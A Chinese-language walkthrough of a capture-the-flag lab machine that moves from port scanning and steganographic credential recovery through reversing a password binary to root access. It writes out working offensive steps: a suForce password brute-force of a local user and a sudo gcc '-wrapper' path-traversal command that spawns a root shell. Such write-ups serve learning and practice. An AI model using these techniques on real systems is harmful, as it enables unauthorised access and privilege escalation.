信息收集#
nmap 扫描结果如下:
┌──(root㉿kali)-[~/challenge/0213]
└─# cat nmapscan/detail
# Nmap 7.95 scan initiated Thu Feb 13 10:38:44 2025 as: /usr/lib/nmap/nmap -sC -sV -p22,80 -Pn -n -T4 -sT -oN nmapscan/detail 192.168.56.104
Nmap scan report for 192.168.56.104
Host is up (0.00072s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey:
| 2048 c2:91:d9:a5:f7:a3:98:1f:c1:4a:70:28:aa:ba:a4:10 (RSA)
| 256 3e:1f:c9:eb:c0:6f:24:06:fc:52:5f:2f:1b:35:33:ec (ECDSA)
|_ 256 ec:64:87:04:9a:4b:32:fe:2d:1f:9a:b0:81:d3:7c:cf (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 13 10:38:51 2025 -- 1 IP address (1 host up) scanned in 6.88 seconds
根据扫描结果,目标主机仅开放了 22 和 80 端口,分别为 SSH 和 HTTP 服务。HTTP 服务使用的是 Nginx 1.14.2 版本,且网页显示为 Apache2 的默认欢迎页面。
web 踩点#
尝试爆破目录一无所获
首页是一个典型的 Apache2 Ubuntu 默认页面。为了进行进一步的探测,我们首先使用wget下载首页并检查其大小
发现该页面的大小果然与常规的 Apache2 页面有所不同。接着,查看其源码,发现了两个非常关键的注释:
<!-- 117db0148dc179a2c2245c5a30e63ab0 -->-> 尝试用 md5 解密无果<!-- Some people always don't understand the format of photos. -->-> 结合上面注释猜测存在隐藏图片文件
我们使用gobuster进行目录爆破
┌──(root㉿kali)-[~/challenge/0213]
└─# gobuster dir -w hint -u `IP` -x .jpg,.jpeg,.png,.gif,.bmp,.tiff,.webp --exclude-length 11618
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: hint
[+] Negative Status codes: 404
[+] Exclude Length: 11618
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,jpeg,png,gif,bmp,tiff,webp
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/117db0148dc179a2c2245c5a30e63ab0.jpg (Status: 200) [Size: 190696]
/117db0148dc179a2c2245c5a30e63ab0.png (Status: 200) [Size: 379011]
Progress: 8 / 16 (50.00%)
===============================================================
Finished
===============================================================
根据爆破结果,发现了两个图片文件:
图片隐写分析#
jpg:#
┌──(root㉿kali)-[~/challenge/0213]
└─# exiftool 117db0148dc179a2c2245c5a30e63ab0.jpg
ExifTool Version Number : 13.10
File Name : 117db0148dc179a2c2245c5a30e63ab0.jpg
Directory : .
File Size : 191 kB
File Modification Date/Time : 2025:02:13 01:33:04+08:00
File Access Date/Time : 2025:02:14 21:09:38+08:00
File Inode Change Date/Time : 2025:02:13 10:55:21+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : 219f26695ac66c93de9de70eebeefea4deb071df71b9b7d7ebcc06eca47ff6e4
Image Width : 1280
Image Height : 960
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1280x960
Megapixels : 1.2
┌──(root㉿kali)-[~/challenge/0213]
└─# stegseek 117db0148dc179a2c2245c5a30e63ab0.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.42% (132.7 MB)
[!] error: Could not find a valid passphrase.
在Comment字段中,我们得到一串字符但解不出来,应该是烟雾弹;之后,我们使用stegseek工具进行隐写分析,但未能找到有效的密码。
png:#
使用zsteg检查 lsb 隐写
┌──(root㉿kali)-[~/challenge/0213]
└─# zsteg 117db0148dc179a2c2245c5a30e63ab0.png
imagedata .. text: "\n\n\n\t\t\t\n\n\n"
b1,rgb,lsb,xy .. text: "morainelake"
b1,bgr,msb,xy .. file: OpenPGP Public Key
b2,r,lsb,xy .. text: "UUUUUUUU@"
b2,g,lsb,xy .. text: "E@UAUUUUUUUUj"
b2,g,msb,xy .. text: "UUUZs-VUU"
b2,b,lsb,xy .. text: "EUUUUUUUUV"
b2,b,msb,xy .. text: "_UUUoUUe"
b3,b,msb,xy .. file: MPEG ADTS, layer I, v2, 96 kbps, Stereo
b3,rgb,lsb,xy .. file: PGP Secret Sub-key -
b4,r,lsb,xy .. text: "DEUTfgww"
b4,r,msb,xy .. text: "M,\"\"\"\"\"\""
b4,g,lsb,xy .. text: ["\"" repeated 10 times]
b4,g,msb,xy .. text: "HDDDDDDDDDDH"
b4,b,lsb,xy .. text: "3\"##2\"\"#33333333333333334DDDDDDDDDD4C333\"\"\""
b4,b,msb,xy .. text: ",\"\"\"\"\"\"\"\"\"\","
存在 lsb 隐写, 这里的morainelake很可能是一个潜在的密码
使用密码 morainelake 成功提取 steghide 隐藏的文件:
┌──(root㉿kali)-[~/challenge/0213]
└─# steghide extract -sf 117db0148dc179a2c2245c5a30e63ab0.jpg -p morainelake
the file "secret.zip" does already exist. overwrite ? (y/n) y
wrote extracted data to "secret.zip".
接着解压 secret.zip 文件,同样用上面的密码:
┌──(root㉿kali)-[~/challenge/0213]
└─# unzip secret.zip
Archive: secret.zip
creating: secret/
[secret.zip] secret/secret.txt password:
extracting: secret/secret.txt
最终得到了一组 ssh 凭据:
┌──(root㉿kali)-[~/challenge/0213]
└─# cat secret/secret.txt
morainelake:660930334
提权 - welcome#
首先对 /opt/reverse 程序进行逆向分析
main 函数的伪代码如下:
int __fastcall main(int argc, const char **argv, const char **envp)
{
char v4[28]; // [rsp+9h] [rbp-E7h] BYREF
char v5[7]; // [rsp+25h] [rbp-CBh] BYREF
char v6[16]; // [rsp+2Ch] [rbp-C4h] BYREF
int v7; // [rsp+3Ch] [rbp-B4h] BYREF
int v8; // [rsp+40h] [rbp-B0h] BYREF
int v9; // [rsp+60h] [rbp-90h] BYREF
int v10[8]; // [rsp+80h] [rbp-70h] BYREF
char dest[24]; // [rsp+A0h] [rbp-50h] BYREF
void *ptr; // [rsp+B8h] [rbp-38h]
int v13; // [rsp+C0h] [rbp-30h]
char v14; // [rsp+C7h] [rbp-29h]
char *v15; // [rsp+C8h] [rbp-28h]
char *v16; // [rsp+D0h] [rbp-20h]
void *v17; // [rsp+D8h] [rbp-18h]
void *v18; // [rsp+E0h] [rbp-10h]
char v19; // [rsp+EBh] [rbp-5h]
int v20; // [rsp+ECh] [rbp-4h]
puts("Enter passwords or Enter H coward mode:");
v20 = 0;
while ( 1 )
{
__isoc99_scanf("%s", &v4[7]);
if ( strcmp(&v4[7], "H") )
break;
if ( ++v20 == 100 )
{
puts("Hint: Invert XOR Replace! ");
goto LABEL_6;
}
}
strcpy(dest, &v4[7]);
__isoc99_scanf("%s %s %s", v10, &v9, &v8);
LABEL_6:
v7 = 8203321;
strcpy(&v6[9], "/, 8:(");
strcpy(v6, "!!|}yx{z");
strcpy(v5, "(;$)(#");
v19 = 77;
v18 = (void *)xor_decrypt(v6, 77LL);
v17 = (void *)xor_decrypt(&v6[9], (unsigned int)v19);
v16 = (char *)xor_decrypt(&v7, (unsigned int)v19);
v15 = (char *)xor_decrypt(v5, (unsigned int)v19);
if ( (unsigned int)check_passwords((int)dest, (int)v10, (int)&v9, (int)&v8, (int)v18, (int)v17, v16, v15) )
{
strcpy(v4, "pvygob");
v14 = 106;
v13 = 10;
ptr = (void *)caesar_decrypt(v4, 10LL);
printf("[+] Enter the password successfully! you know: %s\n", (const char *)ptr);
free(ptr);
}
else
{
puts("[-] Incorrect password!");
}
free(v18);
free(v17);
free(v16);
free(v15);
return 0;
}
该程序的 main 函数的主要功能是密码验证。在函数中,首先会提示用户输入密码或进入 “H coward mode” 模式。如果用户输入了 "H",则程序会提示有关 XOR 操作的提示,并继续执行其他操作。接着,程序通过多个 xor_decrypt 和 caesar_decrypt 解密函数来解密一系列预设的字符串,最终通过 check_passwords 函数验证密码是否正确。如果密码正确,程序会通过 caesar_decrypt 解密一个字符串并输出提示信息。
结合程序的 xor_decrypt 和 caeser_decrypt 函数的具体实现,可编写如下解密脚本:
def xor_decrypt(data, key):
return ''.join(chr(ord(c) ^ key) for c in data)
def caesar_decrypt(data, shift):
decrypted = []
for char in data:
if char.isalpha():
shift_amount = 65 if char.isupper() else 97
decrypted.append(chr((ord(char) - shift_amount - shift) % 26 + shift_amount))
else:
decrypted.append(char)
return ''.join(decrypted)
# 解密字符串
v6 = "!!|}yx{z"
v6_part = "/, 8:("
v5 = "(;$)(#"
v4 = "pvygob"
v7 = 8203321
# 将 v7 转换为字节数组
v7_bytes = v7.to_bytes((v7.bit_length() + 7) // 8, 'little')
# 使用XOR解密
key = 77
decrypted_v6 = xor_decrypt(v6, key)
decrypted_v6_part = xor_decrypt(v6_part, key)
decrypted_v5 = xor_decrypt(v5, key)
decrypted_v7 = xor_decrypt(v7_bytes.decode(), key)
# 使用凯撒解密
shift = 10
decrypted_v4 = caesar_decrypt(v4, shift)
print("Decrypted v6:", decrypted_v6)
print("Decrypted v6_part:", decrypted_v6_part)
print("Decrypted v5:", decrypted_v5)
print("Decrypted v7:", decrypted_v7)
print("Decrypted v4:", decrypted_v4)
根据 check_passwords 函数的输入要求,我们知道正确密码的组成部分是:
用户输入 vs 预期解密值
--------------------------------
dest == v18
v10 == v17
v9 == v16
v8 == v15
按顺序输入
成功破解程序,但我们的目的是拿到 welcome 用户
用下面代码生成包含上面四个输入的全排列字典:
import itertools
# 定义四个字符串
strings = ["ll104567", "bamuwe", "eviden", "ta0"]
# 生成全排列
permutations = list(itertools.permutations(strings))
# 打印全排列结果
for perm in permutations:
print(''.join(perm))
然后上传 suForce 进行爆破
morainelake@listen:/tmp$ ./suForce -u welcome -w dict
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | welcome
📖 Wordlist | dict
🔎 Status | 2/24/8%/ll104567bamuweta0eviden
💥 Password | ll104567bamuweta0eviden
───────────────────────────────────
爆破成功,拿到 welcome 用户权限
提权 - root#
root 部分比较简单,几乎是现成的 sudo 提权
morainelake@listen:/tmp$ su - welcome
Password:
$ bash
welcome@listen:~$ sudo -l
Matching Defaults entries for welcome on listen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on listen:
(ALL : ALL) NOPASSWD: /usr/bin/gcc -wrapper /opt/*
gtfo 查阅提权方式
welcome@listen:~$ sudo gcc -wrapper /opt/../../../../bin/bash,-s .
root@listen:/home/welcome# id
uid=0(root) gid=0(root) groups=0(root)
使用../绕过目录限制,成功提权至 root。
小结#
靶机入口点卡了我很久,虽然我很快就找到了两个隐藏图片,但是 stegseek 没爆出来密码我就没往 steghide 隐写这方面想了。。
总的来说,这台靶机很有意思,感谢 LingMj 大佬的辛苦制作呀!